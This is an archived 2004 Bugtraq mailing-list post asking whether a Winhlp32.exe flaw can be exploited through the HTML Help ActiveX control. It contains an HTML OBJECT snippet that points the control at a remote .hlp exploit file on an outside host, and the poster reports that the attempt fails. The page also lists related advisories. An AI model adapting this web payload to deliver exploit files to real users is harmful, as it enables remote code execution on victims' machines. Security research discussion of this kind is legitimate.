New Winhlp32.exe vuln

bad_son_at_pimp.it
Date: 12/25/04

Next message: Brett Glass: "Re: Microsoft Windows LoadImage API Integer Buffer overflow"

Previous message: K-OTiK Security: "Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Fri, 24 Dec 2004 18:53:52 -0500 (EST)
To: <bugtraq@securityfocus.com>

Can this vulnerability be exploited using the HTML help ActiveX control ?

I am trying:
<OBJECT
   id=winhelp
   type="application/x-oleobject"
   classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
   codebase="hhctrl.ocx#Version=5,02,3790,1194"
   width=100
   height=100
>
   <PARAM name="Command" value="WinHelp">
   <PARAM name="Button" value="Text:Exploit">
   <PARAM name="Item1"
value="http://www.xfocus.net/flashsky/icoExp/search.hlp">MyWindow">

</OBJECT>

However, i get an error "This operation is allowed only within HTML help" ?

Is this approach wrong ?

Next message: Brett Glass: "Re: Microsoft Windows LoadImage API Integer Buffer overflow"

Previous message: K-OTiK Security: "Re: New Santy-Worm attacks *all* PHP-skripts ( Santy.c ? )"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[NT] Unchecked Buffer in Windows Help Facility Could Enable Code Execution
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A second vulnerability exists because of flaws associated with the ... handling of compiled HTML Help files that contain shortcuts. ... Buffer Overrun in HTML Help ActiveX Control: ...
(Securiteam)
Re: Winhelp32 Remote Buffer Overrun
... > the HTML Help ActiveX control. ... > execute in the context of the logged on user. ...
(Bugtraq)
Re: Winhelp32 Remote Buffer Overrun
... > notified microsoft of this several months ago. ... >> the HTML Help ActiveX control. ...
(Bugtraq)
Winhelp32 Remote Buffer Overrun
... Many of the features available in HTML Help are implemented through ... the HTML Help ActiveX control. ...
(Bugtraq)
[UNIX] Vulnerability in HTML Help Could Allow Code Execution (MS04-023)
... Get your security news from a reliable source. ... The vulnerability could allow malicious ... could allow an attacker to take complete control of an affected system. ... A remote code execution vulnerability exists in HTML Help that could allow ...
(Securiteam)